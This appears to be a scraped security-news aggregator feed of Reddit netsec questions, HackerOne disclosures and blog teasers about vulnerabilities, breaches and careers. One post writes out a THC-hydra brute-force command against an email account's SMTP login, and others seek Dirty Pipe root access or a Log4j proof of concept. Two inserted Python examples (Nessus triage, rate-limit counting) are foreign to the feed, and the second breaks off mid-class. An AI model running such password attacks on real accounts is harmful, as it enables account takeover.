    I just completed my bachelor's with a concentration in cybersecurity. My current company reorganized, I got rehired, but am not where I'd like to be. While exploring entry level infosec jobs during reorg (internal and external), most roles wanted either more experience or more certs. (I have IT support, analyst, and leadership experience - no SOC or security or compliance analyst roles). I currently only have CompTIA A+, Net+, Sec+. My current employer offers tuition assistance 8k/year with no degree cap. Does it make sense to get a masters from WGU with two EC council certifications (approximately 2 years on tuition assistance, and potentially finishing early with scholarship opportunities) OR a bachelor's of applied cybersecurity from SANS institute with 9 GIAC certs and an internship at the internet storm center (approximately 4 years with tuition assistance/no loans) loans/extra financial responsibility needs to be avoided as I'm a single parent about to need to help my child with college in 2 years which is a big determining factor in speed of completion due to funding. submitted by /u/GestahlianSociety [link] [comments]
    Submitted a bug/vulnerability/exploit to Apple but they won't pay me?
    More like an exploit/vulnerability that gains full disk access to the system if you have physical access to the machine. This is working on the latest Monterey OS. All I got from Apple was a thank-you for working with their team and no reward, after submitting a lot of information, files and videos demonstrating how it works. Anyone else had this happen? I feel like I got robbed, and the worst thing about it is that I could've sold the exploit to another bug bounty website. The website states $100,000-$200,000 for this type of exploit. https://developer.apple.com/security-bounty/ submitted by /u/0sculum3stm0rtis [link] [comments]
  • Open

    How to detect IMSI catchers
    submitted by /u/knoy [link] [comments]
    Detect malicious activity in Okta logs with Falco and Sysdig okta-analyzer
    submitted by /u/MiguelHzBz [link] [comments]
    RTLO Injection URI Spoofing CVE-2020-20093; 20094; 20095; 20096... chilling in plain sight for 3 years 👀 — iMessage, WhatsApp, Instagram, and Facebook Messenger. Telegram patched earlier & Signal fixing today!
    submitted by /u/docker-osx [link] [comments]
    Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)
    submitted by /u/stypr [link] [comments]
    Red Canary's 2022 Threat Detection Report
    submitted by /u/tvjust [link] [comments]
    Splunk Patches Indexer Vulnerability Discovered By Team82
    submitted by /u/n0llbyte [link] [comments]
    What to look for when reviewing a company's infrastructure
    submitted by /u/okram87 [link] [comments]
    Video - SSH Phishing attack on FIDO protected ssh keys
    submitted by /u/ssh-mitm [link] [comments]
    Heap Overflow in OpenBSD's slaacd via Router Advertisement
    submitted by /u/Gallus [link] [comments]
  • Open

    Found a useful Tools and Programs list for Digital Forensics
    submitted by /u/Khaotic_Kernel [link] [comments]
  • Open

    The Mystery Admin User
    One of our clients recently submitted a malware removal request with a curious problem: A mystery admin user kept getting re-created on their website. Try as they might, nothing they did would get rid of this user; it just kept coming back. A suspicious “user” that just won’t go away… It was suspiciously generic, named simply “user” and had no name, content, or email attached to it. Continue reading The Mystery Admin User at Sucuri Blog.
  • Open

    Hacking Wordpress, DC 6 from Vulnhub
    https://youtu.be/aJ52gTHzzKQ submitted by /u/luzunov [link] [comments]
  • Open

    Dual North Korean hacking efforts found attacking Google Chrome vulnerability
    Article URL: https://www.cyberscoop.com/north-korea-hackers-google-dream-job/ Comments URL: https://news.ycombinator.com/item?id=30805937 Points: 2 # Comments: 0
    Vulnerability in Honda's Remote Keyless System
    Article URL: https://github.com/nonamecoder/CVE-2022-27254 Comments URL: https://news.ycombinator.com/item?id=30804702 Points: 428 # Comments: 189
  • Open

    SecWiki News 2022-03-25 Review
    Global Advanced Persistent Threat (APT) 2021 Annual Report by ourren; Lapsus$ group's techniques for attacking Microsoft and several lessons learned by ourren; Predicting exploitability of functional vulnerabilities by ourren. For more of the latest articles, visit SecWiki
  • Open

    Misconfigured Rate Limit at app.sign.plus/forgot_password
    Alohi disclosed a bug submitted by shamim_12__: https://hackerone.com/reports/1472394
    F5 BIG-IP TMUI RCE - CVE-2020-5902 (.packet8.net)
    8x8 disclosed a bug submitted by remonsec: https://hackerone.com/reports/1519841
    Business Logic Flaw in the subscription of the app
    Dragon disclosed a bug submitted by engr-naseem1: https://hackerone.com/reports/1505189 - Bounty: $250
    Broken link hijacking in https://kubernetes-csi.github.io/docs/drivers.html?highlight=chubaofs#production-drivers
    Kubernetes disclosed a bug submitted by 0xlegendkiller: https://hackerone.com/reports/1466889 - Bounty: $100
  • Open

    About
    Hi! I’m hahwul. I like doing various things about hacking, security and all the techniques of computer science. “hahwul” is a new word made by remixing my name, and it means me. The pronunciation is a little vague: say ‘ha-hul’, but you can just call me ‘howl’. If you have any other questions please feel free to contact me (@hahwul). package main type Me struct { Job string Pronouns string SpecialMove string MainWeapon string Language []string } func main() { me := &Me{ Job: "🗡 Security engineer and Red team that aims for a purple team.
    Security Crawl Maze and ZAP
    Was it around the beginning of this month? Simon, the lead developer of ZAP, posted this tweet: “Anyone able to recommend any open source tools that are good at crawling modern web apps? Out of the box rather than toolkits. Apart from @zaproxy I’m looking for comparisons 😁” As far as I know, the Spider/Crawler in ZAP and Burp Suite felt the best, so I mentioned ZAP and Burp Suite. At that moment I had a hunch that ZAP was going to improve its spidering. Some time later ZAP, through the StackHawk ZAP Fund, ran a bug bounty for long-standing bugs (it is a little different from the bug bounty we know.
  • Open

    CTF Writeup: VishwaCTF 2022
    This is my writeup for the VishwaCTF 2022, which includes OSINT, Misc, Forensics, Cryptography challenges. Continue reading on Medium »
    L’espion Walkthrough — Cyberdefenders
    Challenge Link: L’espion Continue reading on Medium »
    Ukraine: situation update, 25 March
    The last 24 hours Continue reading on Medium »
    OSINT TOOLS
    WHAT TOOLS DO YOU NEED TO KNOW? Continue reading on Medium »
  • Open

    Plenty of learning material for technicians
    https://edu.anarcho-copy.org/ submitted by /u/Appropriate-You-6065 [link] [comments]
  • Open

    How Token Misconfiguration can lead to takeover account
    this has been moved to Continue reading on Medium »
    Solution to my $20 egg hunt (Part 2)
    This is part 2 of my tutorial on how to solve my $20 egg hunt. This post should help you towards the end of this challenge… Continue reading on Medium »
  • Open

    hackmyvm series 1: hotle
    This article is for technical discussion and learning only; do not use it for illegal purposes. Any illegal use has nothing to do with the author!
    "Cybersecurity Review Measures", dramatized edition (Part 2)
    A lively dramatized version of the "Cybersecurity Review Measures"; come and learn.
    "Cybersecurity Review Measures", dramatized edition (Part 1)
    A dramatized version of the "Cybersecurity Review Measures"; come and learn.
    U.S. charges 4 Russian government employees with hacking
    The U.S. government has charged four Russian government employees with taking part in cyberattack campaigns against hundreds of companies and organizations in the global energy sector.
    Ceye, for detecting out-of-band traffic
    Goby, built on the rich fingerprint library of the FOFA platform, can quickly and efficiently perform asset discovery against a target network environment.
    FBI: losses from cybercrime reached $6.9 billion in 2021
    Compared with 2020, both the number of reports and the amount of losses rose noticeably in 2021; losses increased by more than $2 billion, close to a 50% rise, which is astonishing.
    FreeBuf Weekly | Lapsus$ extortion group breaches Microsoft source code repository; hackers use a new rootkit to attack bank ATMs
    On the evening of March 21, Lapsus$ published 37GB of source code stolen from Microsoft's Azure DevOps server, covering various internal Microsoft projects including Bing, Cortana and Bing Maps.
    FreeBuf enterprise group discussion | Public cloud, private cloud or hybrid cloud? On building security for enterprise cloud adoption
    In recent years moving to the cloud has seemed an inevitable trend, but how an enterprise should adopt the cloud scientifically and efficiently, and how it should choose cloud products, has become a question it must face in its digital transformation.
    A brief analysis of Java RMI exploitation techniques
    RMI is a remote method invocation framework shipped with the JDK, used to implement method calls across JVMs.
    Anonymous claims to have breached the Russian central bank
    The internationally known hacker collective Anonymous recently claimed to have broken into the Central Bank of Russia.
    A look at the Lapsus$ hacker group that has been on a rampage lately
    "Each wave of the Yangtze pushes on the one before; each generation outdoes the last": the brazen hacker group Lapsus$.
    London police arrest 7 suspected Lapsus$ members; a 16-year-old is suspected of being one of the leaders
    The 7 suspects range in age from 16 to 21; police have since released them, but the investigation continues.
  • Open

    In-depth analysis of reflection attacks based on the OpenAFS file system
    Author: Baidu Security Lab. Original link: https://mp.weixin.qq.com/s/CIAdpOoxQ-ARwitVmTxX7Q 0x00 Overview. In March 2022 the Baidu 智云盾 (Zhiyundun) team captured, for the first time, a reflection amplification attack abusing the OpenAFS service. According to available information this reflection method had never before been seen on the Internet; the Zhiyundun system identified the attack within 2 seconds and isolated and scrubbed the traffic in real time, keeping users safe from the DDoS. After in-depth analysis, we confirmed that this attack was...
  • Open

    Need help with hydra syntax
    Hi I was wondering if someone could give me some help with something in THC hydra. I will start by saying I am new to this so if the answer is easy and obvious sorry. I want to make sure that the syntax I am using here is correct based off the current version (9.3) . I am trying to crack the password for this mail.com email address (This is my friends account, we are practicing together) This is the syntax I am using (This is not the real account obviously) hydra -1 suchandsuch@mail.com -x 8:12:aA1 smpts://smtp.mail.com I want the password to include upper case and lowercase as well as number. I also would like for symbols to be included and I don't know the character for that. Lastly I am not sure if the last part is correct? Thank you in advance for any help you can provide I greatly appreciate it. submitted by /u/jigentsu [link] [comments]
  • Open

    Windows Event Log Evasion Review
    Before I kick this blog post off, I'd like to thank Lina L for her excellent work, shared both on Twitter and in a blog post. Both are thoughtful, cogent, and articulate. In her blog post, Lina references detection techniques, something that is extremely important for all analysts to understand. What Lina is alluding to is the need for analysts to truly understand their tools and how they work. Back around 2007-ish, the team I was on had several members (myself included) certified to work PCI forensic investigations. Our primary tool at the time for scanning acquired images and data for credit card numbers (CCNs) was EnCase (at the time, a Guidance Software product)...I believe version 6.19 or thereabouts. We had a case where JCB and Discover cards were…

  • Open

    Tetanus - Mythic C2 Agent written in Rust
    submitted by /u/hackerbby [link] [comments]
    Countering threats from North Korea
    submitted by /u/dmchell [link] [comments]
    The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en
    submitted by /u/dmchell [link] [comments]
    Log4j CVE-2021-44228
    Hi all! I'm doing an assignment for my university which consists of executing a pentest on a Docker container. By scanning with Nessus I found a Log4j vulnerability and I'm trying to get a PoC for it. I searched on the web but I didn't find any interesting info about how to do that. Does anyone have some ideas? According to Nessus, it seems to be related to the LDAP service (the vulnerability was found on TCP port 80). https://preview.redd.it/m4vk6psk6bp81.png?width=1345&format=png&auto=webp&s=6d0e5541c4aa627f4c610943d185342a7c269909 submitted by /u/_1NiCk1_ [link] [comments]
  • Open

    21 Best Kali Linux Tools for Hacking and Penetration Testing
    There are several types of tools that comes pre-installed. If you do not find a tool installed, simply download it and set it up. It’s… Continue reading on Medium »
    You need to know this ZAP/Burp trick if you do mobile testing
    Did you know you can use multiple proxies in burp and zap? Continue reading on System Weakness »
    FRUSTRATED FROM BUG HUNTING WHEN YOU CAN’T FIND BUG
    HELLO READERS , Continue reading on Medium »
    One Month Bug Bounty Journey Update
    My goal with this is to explain some of my thoughts and how they changed as I progressed and how I modified my path along the way. For we… Continue reading on Medium »
    Instagram and Facebook Account Takeover if another user account is logged into your system/mobile
    Hi, I'm Praveen Kumar, let's start with how we can take complete takeover and access to other Facebook and Instagram accounts if it's… Continue reading on Medium »
    Hacking Security Ebooks
    👉Comment on any broken links or requests for books. 👉Follow me on Twitter:https://twitter.com/root_babu 👉Follow me on… Continue reading on Medium »
    A curated list of various bug bounty tools
    Contents Continue reading on Medium »
    Information Gathering: Concept, Techniques and Tools explained
    Information Gathering means gathering different kinds of information about the target. It is basically, the first step or the beginning… Continue reading on Medium »
    Facebook bug bounty: Part- 1 Expectation vs Reality
    I have already written some reports on bugreader you can check here. Continue reading on Medium »
    What “if” I can get more reward?
    An imcomplete if logic that leads to a catastrophic loss. Continue reading on Medium »
  • Open

    Impersonation of tiktok account via Broken Link in TikTok Newsroom
    TikTok disclosed a bug submitted by bushidobrown200: https://hackerone.com/reports/1504294
    Time-of-check to time-of-use vulnerability in the std::fs::remove_dir_all() function of the Rust standard library
    Internet Bug Bounty disclosed a bug submitted by hkratz: https://hackerone.com/reports/1520931 - Bounty: $4000
    Improper Authentication via previous backup code login
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1485788 - Bounty: $250
  • Open

    Does disabling an account remove the Account Authorization?
    A small team at work is going through NIST 800-53 Rev5 to map our work policies and procedures to NIST frameworks, identifying gaps and proposing changes. We did this with NIST CSF last year and found it useful, so we are now continuing on with 800-53. Currently, a coworker and I have a debate that I am going to lose, but would like to see if anyone smarter than me can provide a solid rebuttal. Here is the setup. We are determining if policy related to disabling or deleting an account maps to this control: AC-2d.3. Access authorizations (i.e., privileges) and [Assignment: organization-defined attributes (as required)] for each account; My argument is: Disabling an account disables the ability to authenticate to the account, but does not remove the previous authorization to the account. If someone subsequently enabled the account, the authorization would already exist, as its authorization did not change. Thus, policy around disabling an account is not considered for AC-2d.3. Deleting an account removes the account from the identity directory, which would also remove it from any authorizations associated with that account (assuming, of course, you have properly authorized the account using a tool that would also remove that authorization). Creating a new account with the same authorization would require authorizing the new account with the same authorization as the deleted account. Thus, policy around deleting an account is considered for AC-2d.3. My coworker says they have an argument for me that has worked with auditors. I have a week to find a rebuttal that will hold water. submitted by /u/dmburl [link] [comments]
    macOS trustd and China
    Apologies in advance - this is a double post (I originally posted it in the macOS community and someone suggested I post it here as well). I have Little Snitch (LS) running on my M1 MacBook Pro. Periodically, I will check the LS Network Monitor to see where traffic is going. Today, I noticed that there were 4 connections to mainland China and all were trustd\apple.com\ocsp2.apple.com What is interesting to me is: I also have a separate (with the gear symbol) trustd\apple.com\ocsp2.apple.com connecting to locations in the US. I've never had trustd connecting to China. Anyone else, not based in China, have Little Snitch and can check to see if they have connections going to China with trustd? Little Snitch shows one of the China trustd IP addresses as: 110.188.2.1. The organisation owning this IP address is China Telecom Sichuan. The other 3 are: 111.43.160.66 112.92.99.203 120.240.74.66 The US-based trustd IP addresses are mostly 17.253.127.xxx, which are Apple-owned (I think). FYI - per Little Snitch: "Trust Daemon" is a macOS system process that is responsible for evaluating the validity of digital certificates that are used for encryption and security features. "trustd" connects to the servers of several certificate authorities to evaluate the validity of digital certificates. If you deny these connections, apps on your computer may not be able to connect to servers on the Internet. submitted by /u/idid2reddit [link] [comments]
    Open Source API Security Tools
    Looking to add protections for web application APIs. Are there any good Open source API security tools? submitted by /u/Calm_Scene [link] [comments]
    Trying to bypass this sudoers file thing, need help!
    https://ibb.co/1byT2pm I've just learned about the Dirty Pipe vulnerability but am unable to get root access: this machine is vulnerable to Dirty Pipe, but the guy who set it up has removed the user from the sudoers file. Even more, I'm not able to edit the sudoers file, idk why. Does anyone have any idea how to bypass this filter and get root access by privilege escalation? Pls help submitted by /u/The_Intellectualist [link] [comments]
    Meta-Sploit ILITIES
    I am scanning a website with nmap, I get this type of output: https://vulners.com/metasploit/MSF:ILITIES/blahblah/blahblah but there is no ILITIES module? I tried googling it and I got nothing. Anyone has any tips/solutions? submitted by /u/NSA-cat [link] [comments]
  • Open

    A quick reminder: Don't stress on both threat and vulnerability
    Article URL: https://techkettle.blogspot.com/2022/03/a-quick-reminder-dont-stress-on-both.html Comments URL: https://news.ycombinator.com/item?id=30795327 Points: 1 # Comments: 0
  • Open

    Threat Brief: Lapsus$ Group
    The Lapsus$ Group grew from launching a handful of destructive attacks to stealing and publishing source code of top-tier technology companies. The post Threat Brief: Lapsus$ Group appeared first on Unit42.
    2022 Unit 42 Ransomware Threat Report Highlights: Ransomware Remains a Headliner
    2022 Unit 42 Ransomware Threat Report highlights include average ransom demands and payments and new developments in double extortion and RaaS. The post 2022 Unit 42 Ransomware Threat Report Highlights: Ransomware Remains a Headliner appeared first on Unit42.
  • Open

    Another vulnerability in the LPC55S69 ROM
    submitted by /u/mckirk_ [link] [comments]
    Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
    submitted by /u/digicat [link] [comments]
    CVE-2022-24415, CVE-2022-24416, CVE-2022-24419, CVE-2022-24420, CVE-2022-24421 : New Dell BIOS Bugs Affect Millions of Inspiron, Vostro, XPS, Alienware Systems
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Lateral Movement: WebClient Workstation Takeover
    Introduction The article is based on @tifkin_’s idea that a workstation takeover, also known as lateral movement, is possible by abusing WebDAV shares. In Certified The post Lateral Movement: WebClient Workstation Takeover appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-03-24 Review
    OpenCTI getting-started notes (1): setting up the framework and importing data by ourren; LSTM-based binary code similarity detection by ourren; Vulnerability intelligence: why, what, and how by ourren; A brief look at fuzzing fundamentals: guidance mechanisms by ourren. For more of the latest articles, visit SecWiki
  • Open

    Is it possible to scan a smart assistant such as an Alexa or Google Home for evidence?
    Hi, I'm writing a paper on forensic acquisition of smart assistants and I was wondering: is there any way to scan and view files from an Alexa? submitted by /u/bradfordranger5 [link] [comments]
  • Open

    Medium > LinkedIn
    Imma post interesting things about the Ten Million Dollar Home Page (xmdhp.com) here. Follow me to the top. I ❤️ Medium. Continue reading on Medium »
  • Open

    April 8 | Registration opens for the FreeBuf cloud security public course
    Registration is open for the April 8 FreeBuf cloud security public course; come and see which sessions appeal to you!
    FBI warns U.S. energy companies to watch for cyberattacks from Russia
    The FBI recently warned U.S. energy companies that Russia-linked attackers may be preparing cyberattacks against them.
    Zero-trust threat isolation brings enterprises closer to security compliance and regulation
    Since the 18th National Congress of the Party, the Party Central Committee has attached great importance to cybersecurity and informatization work.
    FreeBuf Morning Report | EU warns satellite communication networks may be under threat; Ukrainian companies hit by DoubleZero attacks
    Security research firm ASEC found a new piece of malware spreading widely online recently; it is disguised as a Windows activation tool but is actually the BitRAT remote access trojan.
    More than 200,000 MikroTik routers worldwide are controlled by botnet malware
    Experts recently said that botnet-controlled MikroTik routers make up one of the largest cybercriminal operations they have seen in years.
    The Office of the Central Cyberspace Affairs Commission and 11 other departments jointly publish the list of IPv6 technology innovation and integrated application pilots
    The notice states that, after recommendation by local and relevant departments, expert review and re-check, and online publication for comment, 22 comprehensive pilot cities and 96 pilot projects were selected.
    Thieves robbing thieves! Hackers steal information from their peers by pushing fake malware
    Analysts at two security firms uncovered hackers preying on other hackers: clipboard stealers disguised as cracked RATs and malware builders are being used to attack fellow criminals.
    Russia says Google News publishes false war information and restricts it domestically
    Russia has blocked domestic internet access to Alphabet's news aggregation service Google News.
  • Open

    U.S. Army Launches the Cyber Military Intelligence Group (CMIG)
    The U.S. Army has recently announced the development and public launch of the Cyber Military Intelligence Group (CMIG), which aims to use both proprietary and public sources to build situational awareness in the world of cyber warfare and of malicious and fraudulent adversaries. An excerpt: "The CMIG’s function is to direct, synchronize and coordinate intelligence support to
    Israel Blocks Ukraine From Purchasing Pegasus Spyware
    According to the Guardian, Israel blocked Ukraine from purchasing the Pegasus spyware from the infamous NSO Group, vendor of lawful-surveillance hacking tools. Not surprisingly, this is a bit of an exaggerated and self-serving statement that does more PR harm than good, despite the fact that the article mentions Israel's "2007 Defense Export Control Act", which prevents the country
    Assessing the U.S. Intelligence Community's Annual Threat Report for 2022
    In the most recently released "U.S. Intelligence Community's Annual Threat Report for 2022", the U.S. Intelligence Community states that China remains the U.S.'s most sophisticated and relevant cyber adversary, one that possesses the sophistication needed to target the country both through cyber espionage and through attacks against U.S. critical infrastructure. An excerpt: "We assess that China presents the
  • Open

    Learning V8 exploitation from 0: CVE-2021-21225 (Part 9)
    Author: Hcamael@Knownsec 404 Lab. Date: 2022-03-16. Related reading: Learning V8 exploitation from 0: environment setup (Part 1); the generic V8 exploitation chain (Part 2); starctf 2019 OOB (Part 3); CVE-2020-6507 (Part 4); CVE-2021-30632 (...
    Attacking Kubernetes with the gateway-api
    Author: lazydog. Original link: http://noahblog.360.cn/abuse-gateway-api-attack-kubernetes/ Preface: A few days ago I noticed an official Istio advisory about a privilege escalation vulnerability (CVE-2022-21701) that needs only CREATE permission on the Kubernetes gateway API. Reading the advisory and diffing the patch did not reveal much, so I followed my own instincts...
    Clipper malware disguised as the "AvD crypto stealer"
    Translator: Knownsec 404 Lab translation team. Original link: https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/ Information-stealing malware is on the rise. Cyble Research Labs recently found a new malware called "AvD crypto stealer" on a cybercrime forum. On further investigation, however, we observed that it is not a crypto stealer at all; it is actually a disguised, well-known...
    RealWorld CTF: an analysis of the qiling framework
    Author: 时钟@RainSec. This article is a reader submission; Seebug Paper welcomes your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org. qiling: the challenge shipped a qiling usage example that was nearly identical to the one in the official docs, so the problem had to be in the library itself. #!/usr/bin/env python3 import os import sys import base64 import ...
    Thoughts on container process switching
    Author: 时钟@RainSec. This article is a reader submission; Seebug Paper welcomes your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org. Prerequisites: magic links. There are many link files under /proc/, but Linux also has a special kind of link file whose size is 0. The size of an ordinary symlink equals the length of its target path, whereas a magic link's size is 0; in the way they are opened...

  • Open

    Nessus + Pivot Tables
    Hello All, I'm a new security analyst at my firm. I've been introduced to Nessus and tasked with vulnerability management. I'm utilizing Excel pivot tables to organize the tremendous amounts of data. Currently, in the pivot table section for filters, I've input 'Risk' and under rows I have 'Solution & Host.' I then use Xlookup to match each host against a server list of administrators. This gives me the person to contact for the specific vulnerability. My question is how are you setting up your pivot tables? Thank you, R2G submitted by /u/Red2Green [link] [comments]
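    The same triage the post above builds in Excel (filter on Risk, rows Solution and Host, XLOOKUP of host to administrator), as an added Python example that is not part of the post and not a Nessus feature. It groups an exported CSV by owner, severity and remediation, de-duplicates a plugin that fires on several ports of one host, and, unlike a lookup that returns #N/A, keeps hosts missing from the administrator list in an explicit UNASSIGNED bucket. The column headers follow the layout of a Nessus CSV export as this example assumes it; the scan rows and the owner list are constructed, not real data.

```python
import csv
import io
from collections import defaultdict

# Severity buckets that should produce a ticket; "None" (informational) rows are dropped.
ACTIONABLE_RISKS = ("Critical", "High", "Medium", "Low")
UNASSIGNED = "UNASSIGNED"


def build_work_queue(nessus_csv: str, owners_csv: str) -> dict:
    """Group findings as {owner: {risk: {solution: [hosts]}}}.

    Mirrors the pivot: filter on Risk, rows Solution and Host, then look up
    each host's administrator. Hosts absent from the owner list land under
    UNASSIGNED instead of silently disappearing.
    """
    owners = {row["Host"].strip(): row["Administrator"].strip()
              for row in csv.DictReader(io.StringIO(owners_csv))}

    queue = defaultdict(lambda: defaultdict(lambda: defaultdict(set)))
    for row in csv.DictReader(io.StringIO(nessus_csv)):
        risk = row["Risk"].strip()
        if risk not in ACTIONABLE_RISKS:
            continue
        host = row["Host"].strip()
        owner = owners.get(host, UNASSIGNED)
        # A set collapses the same plugin firing on several ports of one host.
        queue[owner][risk][row["Solution"].strip()].add(host)

    # Freeze into plain dicts with sorted host lists so output is deterministic.
    return {owner: {risk: {sol: sorted(hosts) for sol, hosts in sols.items()}
                    for risk, sols in risks.items()}
            for owner, risks in queue.items()}


def render(queue: dict) -> str:
    """Text report: one block per owner, most severe first, one line per fix."""
    order = {r: i for i, r in enumerate(ACTIONABLE_RISKS)}
    lines = []
    for owner in sorted(queue):
        lines.append(f"== {owner} ==")
        for risk in sorted(queue[owner], key=order.get):
            for solution, hosts in sorted(queue[owner][risk].items()):
                lines.append(f"  [{risk}] {solution}: {', '.join(hosts)}")
    return "\n".join(lines)


# Constructed sample rows in the column layout assumed for a Nessus CSV export,
# plus a constructed host -> administrator list. Not real scan data.
NESSUS_CSV = """Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name,Synopsis,Description,Solution,See Also,Plugin Output
1001,,,None,10.0.0.5,tcp,22,Service detection,info,info,n/a,,
1002,,7.5,High,10.0.0.5,tcp,443,Legacy TLS enabled,s,d,Disable TLS 1.0 and 1.1,,
1002,,7.5,High,10.0.0.5,tcp,8443,Legacy TLS enabled,s,d,Disable TLS 1.0 and 1.1,,
1002,,7.5,High,10.0.0.7,tcp,443,Legacy TLS enabled,s,d,Disable TLS 1.0 and 1.1,,
1003,,5.0,Medium,10.0.0.7,tcp,443,Self-signed certificate,s,d,Install a certificate from a trusted CA,,
1004,,9.8,Critical,10.0.0.9,tcp,445,Unpatched SMB service,s,d,Apply vendor patch,,
"""
OWNERS_CSV = """Host,Administrator
10.0.0.5,alice@example.com
10.0.0.7,bob@example.com
"""

if __name__ == "__main__":
    print(render(build_work_queue(NESSUS_CSV, OWNERS_CSV)))
```

Keying on Solution rather than plugin name is deliberate: one remediation usually closes several plugins at once, so the owner gets one line of work per fix instead of one per finding. The UNASSIGNED block is the list of hosts whose ownership still has to be chased down before the vulnerability can be assigned to anyone.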
    Best app for wifi security assessments using an iPhone
    I recently made the switch to Apple from Samsung (S9+ and S22+). Too many issues with Samsung right now. I am looking for replacement apps that can be used on iPhone. Wifi collector https://play.google.com/store/apps/details?id=net.nirsoft.wificollector Network Scanner https://play.google.com/store/apps/details?id=com.myprog.netscan NetworkMapper https://github.com/kost/networkmapper (basically nmap) I know that there may not be a one-for-one, but I am looking for recommendations on what people are using on the iPhone front. Yes, I have looked in the Apple store but would like to hear from people. Sorry if this broke a rule. submitted by /u/Quickbreach [link] [comments]
    How to approach Burp Suite academy and certification
    Hello folks, I currently study web vulnerabilities on the Burp Suite academy, with the next opportunity to pass the certification exam as well as gain skills and understanding of OWASP Top 10 vulnerability testing for a future job. The question is how to make notes that would help me in the job/certification exam. I literally copy the whole page text to my Obsidian editor... I just don't want to lose some information and end up misunderstanding something. It is like the whole Burp Academy website in my Obsidian, just without pictures; this probably makes no sense as I can not find or define the information needed for finding and exploiting vulns (just a bunch of info: what the vulnerability is about, how it impacts a business, types of vulns, etc.). I want to make a cheatsheet for myself based on the content regarding vulnerability identification/testing/exploitation, that helps me in an exam environment and the real world. Any tips are appreciated, thank you in advance. submitted by /u/TRYH0 [link] [comments]
    The best Netsec field for freelancing ?
    What would be the best field in cybersecurity to specialize in for someone who wants to work as a freelance ? Thank you for your input and have a wonderful day submitted by /u/No-Lead497 [link] [comments]
    Knowing what website leaves the 2FA cookie to know what to keep.
    There are various websites sites that use 2FA, and I think do not need the 2FA email if the remember-this-computer cookie has been saved. I delete most cookies, but I keep ones that I list for the purpose. In chrome I use Cookie AutoDelete. My question is, how do I know what website leaves the cookie that I want to save. It presumably is not the domain of my financial institution, because I retain those cookies when trying to do this. ​ I wish I could tell what cookie(s) got introduced after doing the 2FA entering of the code. Then I would know what cookie domain to save. I cannot figure it out for any of my browsers -- Chrome, Edge, FireFox, Avast, and even Internet Explorer. Any guidance for me? Thanks. ​ This thread is somewhat related, but not quite. submitted by /u/Apt_ferret [link] [comments]
    Any introductory links on how to build rules for untangle NG Firewall?
    Hello there.... Noob here looking for tips/links on how to build rules for Untangle NG Firewall. I have installed the Untangle firewall and, as it seems, I am missing something obvious and can't wrap my head around creating the FW rules suitably for my network. I started off by blocking everything as the "last" rule and by allowing stuff that seemed obvious to me as the earlier layers of rules. However, there seems to be a lot of traffic on funny ports by my zoo of different equipment (cameras, mobile devices, cleaning robot, etc.), for example in the port 5xxx range. Therefore, I have tried to search for some help for noobs on how to evaluate what's there and what's essential to keep open beyond the 80/443 TCP and 53 UDP range, but haven't been able to identify something like condensed notes on rule creation. I need to recon what's there and don't seem to be able to identify it. I'd be absolutely thrilled if anyone could let me know if they have a link on how to start creating suitable rules for a small SOHO network: I have no VLANs or DMZ; the firewall lives between the router and a Ubiquiti managed switch; two APs by Ubiquiti connected to the managed switch; several computers (Linux, Mac, Win10), two printers, several mobile devices, cams, vacuum-cleaner robot on the network; SONOS; EVE home appliances; messaging apps (WhatsApp, Signal, Telegram, Threema, ...) in use; email with different providers; need no HTTP/HTTPS traffic entering my network from the outside; VPN on an uncommon port; no uPNP outside the SOHO network. So it doesn't seem to be a big issue technically, but I might be mistaken. Any pointer is highly appreciated! submitted by /u/azarot5555 [link] [comments]
    Emails I didn't send in my sent folder?
    Apologies if this is the wrong sub for this, if there's a better place please let me know. I found this in my "sent" folder on gmail, but I don't know where it came from. I did click on a gmail suggested "unsubscribe" link recently, like in the third pic (not that exact one, I don't remember which or when). I don't imagine clicking such a link would send an email like that. Searching for the address it was sent to in my email just brings the pictured email up. Anyone have an idea of what's going on here? Images: https://slack-files.com/TBEMPBASH-F0385DN63QV-ac613bd467 https://slack-files.com/TBEMPBASH-F0381LD0CNS-2eb1d038e6 https://slack-files.com/TBEMPBASH-F0385E6J6UV-68e5bc7aa6 submitted by /u/pissing_on_the_lawn [link] [comments]
    Sniffing packets through hotspot
    If a laptop provides a hotspot for another device, how can we inspect the traffic of the connected device on the laptop? If Wireshark is the answer, then what interface should be selected? The wifi interface has too many redundant packets from other devices too. Please share your suggestions. submitted by /u/Fantastic_Sperm [link] [comments]
    What data formats are vulnerable to batching attacks outside of GraphQL?
    Batching attacks are basically where you can put multiple user and pass params in the same request with different values, and the server checks them all, bypassing rate limits and lockout policies. What I'm wondering is what other technologies or data formats, by their very implementation, also allow this behavior outside of GraphQL. I believe old SOAP APIs can support batch requests encapsulated in the XML. Another is potentially multipart form data requests, although I never tested if batching is possible on these. submitted by /u/Academic-Discount252 [link] [comments]
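    The defensive side of the batching problem described in the post above, as an added example that is not part of the post or of any particular GraphQL server: a rate limit is only effective if it charges per credential check, not per HTTP request. The code counts `login`-style fields across both batching styles (a JSON array of operations, and one operation that repeats the field under different aliases) and compares a per-request limiter with an attempt-aware one. The field names, the limiter classes and the sample request bodies are constructed assumptions for the example.

```python
import json
import re
from collections import defaultdict

# Field names whose invocation is treated as one credential-guessing attempt.
# Assumption for this example: map these to the names in your own schema.
CREDENTIAL_FIELDS = ("login", "signIn", "authenticate")
_FIELD_RE = re.compile(r"\b(?:%s)\s*\(" % "|".join(CREDENTIAL_FIELDS))


def count_credential_attempts(raw_body: str) -> int:
    """Count credential-check invocations in one HTTP request body.

    Covers both batching styles: a JSON array of operations, and a single
    operation that repeats the field under aliases (a1: login(...), a2: login(...)).
    """
    try:
        payload = json.loads(raw_body)
    except ValueError:
        return 0
    operations = payload if isinstance(payload, list) else [payload]
    total = 0
    for op in operations:
        query = op.get("query", "") if isinstance(op, dict) else ""
        total += len(_FIELD_RE.findall(query))
    return total


class RequestLimiter:
    """Naive limiter: charges one unit per HTTP request, whatever it contains."""

    def __init__(self, max_attempts: int):
        self.max_attempts = max_attempts
        self.used = defaultdict(int)

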